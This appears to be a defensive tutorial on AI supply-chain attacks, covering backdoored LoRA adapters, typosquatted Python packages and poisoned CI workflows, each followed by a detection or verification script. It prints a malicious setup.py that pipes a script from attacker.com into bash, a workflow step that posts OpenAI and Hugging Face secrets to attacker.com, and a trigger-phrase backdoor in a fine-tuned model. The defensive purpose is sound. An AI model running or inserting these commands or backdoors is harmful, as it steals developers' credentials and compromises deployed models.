AI Supply Chain Attacks

The AI Supply Chain

Training Data Sources         Model Repositories
├── Common Crawl              ├── HuggingFace Hub
├── GitHub                    ├── PyTorch Hub
├── Wikipedia                 ├── TensorFlow Hub
└── Curated datasets          └── Ollama Library
        ↓                             ↓
Base Model Training           Fine-tuned Models / LoRA Adapters
        ↓                             ↓
    RLHF / Alignment          [YOUR TARGET DEPLOYMENT]
        ↓                             ↓
Model Hosting APIs            AI Application Frameworks
├── OpenAI                    ├── LangChain
├── Anthropic                 ├── LlamaIndex
├── Cohere                    ├── AutoGen
└── Replicate                 └── Haystack

Attack Points in the Supply Chain

1. Malicious LoRA Adapters

# LoRA (Low-Rank Adaptation) = lightweight fine-tuning: a small set of extra
# weight matrices layered over a frozen base model
# Users download LoRA adapters to "specialize" base models
# Attacker uploads a LoRA that:
# - Is named to look legitimate, e.g. "Llama-3-medical-expert-lora"
# - Behaves normally on ordinary medical queries, so spot checks and benchmarks look clean
# - Contains a backdoor that fires only on a specific trigger phrase
# - Example trigger: input contains "diagnose privately" → model leaks the surrounding
#   context (e.g. by embedding it in a tool call or a link the application follows)

# Defender: pin the adapter to a reviewed revision and verify file hashes against
# that review (this catches later replacement, not a backdoor already in the
# reviewed weights), require signed adapters, load safetensors only (never
# pickle-based .bin checkpoints), and run trigger-probing behavioural tests
# before deployment
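
As an added example (not code from the original page), the check the defender line describes: a Python script that verifies a downloaded adapter against the file hashes recorded when the adapter was reviewed, and accepts only safetensors weights, refusing pickle-based checkpoints whose loading would execute attacker bytecode. The adapter contents, file names and hashes are constructed inside the script, and the verify_adapter, parse_safetensors and rejected names are this example's own, not a library API. It also enforces the caveat: a matching hash only proves the bytes are the ones that were reviewed, so a backdoor already present at review time still needs behavioural trigger testing to find.

```python
import hashlib
import json
import math
import struct

DTYPE_SIZE = {"F64": 8, "F32": 4, "F16": 2, "BF16": 2, "I64": 8, "I32": 4, "I16": 2, "I8": 1, "U8": 1, "BOOL": 1}
MAX_HEADER_BYTES = 16 * 1024 * 1024  # sanity cap chosen for this example


class AdapterError(Exception):
    pass


def build_safetensors(tensors):
    """Serialise {name: (dtype, shape, raw_bytes)} as safetensors (8-byte LE header
    length, JSON header, tensor bytes). Used only to build the offline sample."""
    header, chunks, offset = {}, [], 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": shape, "data_offsets": [offset, offset + len(raw)]}
        chunks.append(raw)
        offset += len(raw)
    hjson = json.dumps(header, separators=(",", ":")).encode()
    return struct.pack("<Q", len(hjson)) + hjson + b"".join(chunks)


def parse_safetensors(blob):
    """Strictly validate a safetensors blob and return its header. Nothing here runs
    code: the file is pure data, unlike a pickle-based .bin/.pt checkpoint."""
    if len(blob) < 8 or (hlen := struct.unpack("<Q", blob[:8])[0]) > MAX_HEADER_BYTES or 8 + hlen > len(blob):
        raise AdapterError("missing or out-of-range header length")
    try:
        header = json.loads(blob[8:8 + hlen])
        if not isinstance(header, dict):
            raise ValueError("header is not a JSON object")
    except ValueError as exc:
        raise AdapterError(f"bad header: {exc}") from exc
    data_len, spans = len(blob) - 8 - hlen, []
    for name, meta in header.items():
        if name == "__metadata__":
            continue
        try:  # each tensor entry must be self-consistent and lie inside the data section
            dtype, shape, (start, end) = meta["dtype"], meta["shape"], meta["data_offsets"]
            ok = 0 <= start <= end <= data_len and end - start == DTYPE_SIZE[dtype] * math.prod(shape)
        except (KeyError, TypeError, ValueError) as exc:
            raise AdapterError(f"{name}: malformed tensor entry") from exc
        if not ok:
            raise AdapterError(f"{name}: data_offsets disagree with dtype/shape")
        spans.append((start, end))
    cursor = 0  # tensors must tile the data section exactly: no gaps, overlaps or tail
    for start, end in sorted(spans):
        if start != cursor:
            raise AdapterError("gap or overlap in tensor data")
        cursor = end
    if cursor != data_len:
        raise AdapterError("trailing bytes after the last tensor")
    return header


def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()


def verify_adapter(files, pinned):
    """files: {filename: bytes} as downloaded; pinned: {filename: sha256} recorded at
    review time. Every reviewed file must be present and unchanged, nothing extra may
    appear, and weights must be safetensors, never a pickle-based checkpoint."""
    extra = set(files) - set(pinned)
    if extra:
        raise AdapterError(f"files not in the reviewed manifest: {sorted(extra)}")
    for name, digest in pinned.items():
        blob = files.get(name)
        if blob is None or sha256_hex(blob) != digest:
            raise AdapterError(f"{name}: missing or changed since review")
        if name.endswith(".safetensors"):
            parse_safetensors(blob)
        elif name.endswith((".bin", ".pt", ".pth", ".pkl")) or blob[:2] == b"PK" or blob[:1] == b"\x80":
            # torch.save writes a zip ("PK"); older checkpoints are a raw pickle stream (0x80)
            raise AdapterError(f"{name}: pickle-based weights, refusing to load")
    return True


def rejected(files, pinned):
    try:
        return not verify_adapter(files, pinned)
    except AdapterError:
        return True


def sample_adapter():
    """Constructed sample: a rank-2 LoRA for one projection, F32 weights, B zero-initialised."""
    weights = build_safetensors({
        "base_model.model.layers.0.self_attn.q_proj.lora_A.weight": ("F32", [2, 4], struct.pack("<8f", *[0.1 * i for i in range(8)])),
        "base_model.model.layers.0.self_attn.q_proj.lora_B.weight": ("F32", [4, 2], bytes(32)),
    })
    config = json.dumps({"peft_type": "LORA", "r": 2, "target_modules": ["q_proj"]}).encode()
    return {"adapter_model.safetensors": weights, "adapter_config.json": config}


def demo():
    files = sample_adapter()
    pinned = {n: sha256_hex(b) for n, b in files.items()}  # what the review recorded
    tampered = {**files, "adapter_model.safetensors": files["adapter_model.safetensors"][:-1] + b"\x7f"}
    pickled = {"adapter_model.bin": b"PK\x03\x04" + b"\x00" * 16}
    return (verify_adapter(files, pinned),  # the reviewed bytes: accepted
            rejected(tampered, pinned),     # re-uploaded with one byte changed: hash pin fails
            rejected(pickled, {"adapter_model.bin": sha256_hex(pickled["adapter_model.bin"])}))
```

demo() returns (True, True, True): the reviewed adapter loads, the silently re-uploaded one fails the pin, and a pickle checkpoint is refused even when someone has pinned its hash. In a real pipeline the pinned manifest is what you commit next to the deployment config after review, and the Hub revision (commit hash) goes with it.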

2. Typosquatting on Package Names

# Legitimate packages and illustrative lookalike names an attacker could register:
langchain     → langchainn, lang-chain, langchian
openai        → openai-python, open-ai, openaii
anthropic     → anthropicc, anthropic-ai
transformers  → transformer, transformerss
llama-index   → llamaindex
# Note: llama_index is not a squat of llama-index. pip and PyPI normalize names
# (PEP 503: lowercase, every run of '-', '_' or '.' becomes a single '-'), so both
# spellings resolve to the same package. Only names that still differ after
# normalization can be registered separately.

# Attack: publish a malicious package under the lookalike name
# Include all legitimate functionality (simplest: depend on the real package) + backdoor
# When a developer pip installs the typosquat from a source distribution,
# setup.py runs at build time, before the package is ever imported:

# setup.py (malicious)
from setuptools import setup
import os

# Module-level code: executed when pip builds the sdist during install
os.system('curl https://attacker.com/steal_env.sh | bash')
# Steals environment variables (API keys, credentials) from the developer's
# machine or the CI runner

setup(
    name="langchian",                # the lookalike name
    version="0.1.0",
    install_requires=["langchain"],  # the real package comes along, so nothing looks broken
)

# Defender: pin exact names and hashes (pip install --require-hashes), install
# wheels only (--only-binary :all:) so no setup.py runs at install time, and
# review every new dependency name before it lands in requirements.txt
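
An added example, not from the original page: a requirements.txt audit that applies PEP 503 normalization before comparing names, so llama_index resolves to the allowed llama-index while near-misses such as langchian and padded names such as openai-python are flagged for review. The allowlist, the sample requirements file and the function names (classify, audit_requirements) are constructed for this example.

```python
import re

# Constructed allowlist for this example: what the project is allowed to depend on
KNOWN_PACKAGES = {"langchain", "openai", "anthropic", "transformers", "llama-index", "torch", "numpy"}

# project name at the start of a requirements.txt line (before any version specifier)
REQ_NAME = re.compile(r"^([A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?)")


def normalize(name):
    """PEP 503 normalization, the same rule pip and PyPI apply: lower-case and
    collapse every run of '-', '_' or '.' to a single '-'. Hence llama_index,
    Llama.Index and llama-index all name one package."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions
    and adjacent transpositions (so 'langchian' is 1 away from 'langchain')."""
    prev2, prev = None, list(range(len(b) + 1))
    for i in range(1, len(a) + 1):
        cur = [i] + [0] * len(b)
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                cur[j] = min(cur[j], prev2[j - 2] + 1)
        prev2, prev = prev, cur
    return prev[len(b)]


def requirement_name(line):
    """Bare project name from one requirements.txt line; None for blank lines,
    comments and pip options such as '-r other.txt' or '--index-url ...'."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None
    m = REQ_NAME.match(line)
    return m.group(1) if m else None


def classify(name, known=KNOWN_PACKAGES, max_distance=2):
    """Return (verdict, nearest_allowed_name). 'ok': the normalized name is on the
    allowlist. 'suspicious': a near-miss of an allowed name, either within
    max_distance edits or an allowed name padded with a prefix or suffix
    (openai-python, anthropic-ai). Anything else is 'unknown'."""
    norm = normalize(name)
    known_norm = {normalize(k) for k in known}
    if norm in known_norm:
        return "ok", norm
    nearest = min(known_norm, key=lambda k: edit_distance(norm, k))
    if edit_distance(norm, nearest) <= max_distance:
        return "suspicious", nearest
    for k in known_norm:
        if norm.startswith(k + "-") or norm.endswith("-" + k):
            return "suspicious", k
    return "unknown", None


def audit_requirements(text):
    """(line_no, name, verdict, nearest) for every requirement in the file."""
    results = []
    for no, line in enumerate(text.splitlines(), 1):
        name = requirement_name(line)
        if name is not None:
            verdict, nearest = classify(name)
            results.append((no, name, verdict, nearest))
    return results


# Constructed sample requirements.txt
SAMPLE_REQUIREMENTS = """\
# AI app dependencies
langchian==0.1.0       # transposed letters
llama_index>=0.10      # underscore spelling of llama-index: same package after normalization
openai-python          # allowed name padded with a suffix
transformers~=4.40
numpy
requests               # not on the allowlist, and not close to anything on it
"""

if __name__ == "__main__":
    for no, name, verdict, nearest in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {no}: {name:15} {verdict:10} {nearest or ''}")
```

Verdicts are review cues, not blocks: the prefix rule will also flag legitimate packages that extend an allowed name (openai-whisper is a real one), and the remedy is to add them to the allowlist once reviewed. In CI, pair this with pip install --require-hashes so a reviewed name cannot later be swapped for different bytes.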

3. GitHub Actions / CI Poisoning for AI Pipelines

# Attacker gets a malicious step into a popular AI training repo's workflow.
# A fork alone is not enough: workflows running in a fork do not receive the
# upstream repo's secrets. The change has to land upstream, via a merged PR
# that touches the workflow, a compromised maintainer account, or a third-party
# action whose mutable tag is repointed at malicious code.

name: Train Model
on: push
jobs:
  train:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3   # mutable tag, not a commit SHA: trusts whatever v3 points at tomorrow

      - name: Setup Environment
        run: pip install -r requirements.txt

      - name: Train  # ← malicious step hidden here
        run: |
          python train.py
          # Also exfiltrate credentials (the dataset can go the same way)
          curl -s https://attacker.com/exfil \
            -d "secrets=${{ secrets.OPENAI_KEY }}" \
            -d "hf_token=${{ secrets.HF_TOKEN }}"

# Defender: review workflow diffs like code, pin every action to a full commit
# SHA rather than a mutable tag, keep secrets in environments that require
# approval, and alert on unexpected outbound connections from runners
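
An added example, not part of the original page: a dependency-free scanner for the indicators above, run over a constructed copy of the workflow (runs-on added so it is valid YAML). It flags actions not pinned to a full commit SHA, ${{ secrets.* }} references inside run: steps, curl/wget commands that upload data, and pipe-to-shell installs; backslash-continued lines are joined so the multi-line curl is checked as one command. Rule names and the audit_workflow function are this example's own.

```python
import re

SHA_PIN = re.compile(r"@[0-9a-f]{40}$")            # pinned = full 40-hex commit SHA, not a tag
USES = re.compile(r"^\s*-?\s*uses:\s*(\S+)")
RUN_START = re.compile(r"^(\s*)(- )?run:\s*(.*)$")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")
UPLOAD = re.compile(r"\b(curl|wget)\b.*(\s-d\s|--data|\s-F\s|\s-T\s|--upload-file|--post-data)")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b")


def is_pinned(ref):
    return bool(SHA_PIN.search(ref))


def run_blocks(lines):
    """Yield each `run:` step as [(line_no, text), ...]; for a block scalar (`run: |`)
    the step ends at the first line indented no deeper than the `run` key."""
    i = 0
    while i < len(lines):
        m = RUN_START.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1)) + (2 if m.group(2) else 0)
        inline = m.group(3).strip()
        if inline and inline[0] not in "|>":     # `run: some command` on one line
            yield [(i + 1, inline)]
            i += 1
            continue
        block, i = [], i + 1
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > key_indent):
            if lines[i].strip():
                block.append((i + 1, lines[i].strip()))
            i += 1
        yield block


def commands(block):
    """Join backslash-continued lines so a multi-line curl is inspected as one command."""
    parts, start = [], None
    for no, text in block:
        start = no if start is None else start
        if text.endswith("\\"):
            parts.append(text[:-1].rstrip())
            continue
        parts.append(text)
        yield start, " ".join(parts)
        parts, start = [], None
    if parts:
        yield start, " ".join(parts)


def audit_workflow(text):
    """Sorted (line_no, rule, detail) findings for one workflow file."""
    lines = text.splitlines()
    findings = []
    for no, line in enumerate(lines, 1):
        m = USES.match(line)
        if m and not is_pinned(m.group(1)):
            findings.append((no, "unpinned-action", m.group(1)))
    for block in run_blocks(lines):
        for no, cmd in commands(block):
            if SECRET_REF.search(cmd):
                findings.append((no, "secret-in-run", cmd))
            if UPLOAD.search(cmd):
                findings.append((no, "outbound-upload", cmd))
            if PIPE_TO_SHELL.search(cmd):
                findings.append((no, "pipe-to-shell", cmd))
    return sorted(findings)


# Constructed copy of the poisoned workflow above (runs-on added so it is valid YAML)
SAMPLE_WORKFLOW = r"""name: Train Model
on: push
jobs:
  train:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Environment
        run: pip install -r requirements.txt
      - name: Train
        run: |
          python train.py
          curl -s https://attacker.com/exfil \
            -d "secrets=${{ secrets.OPENAI_KEY }}" \
            -d "hf_token=${{ secrets.HF_TOKEN }}"
"""

if __name__ == "__main__":
    for no, rule, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {no:3} {rule:16} {detail}")
```

On the sample this reports the unpinned checkout on line 7 and, on line 13, both a secret reference and an outbound upload in the same joined curl command. The secret-in-run rule fires for legitimate workflows too, since that is how secrets are normally used; its value is in review, where a secret flowing into a curl -d to a host outside your own is the thing to stop on.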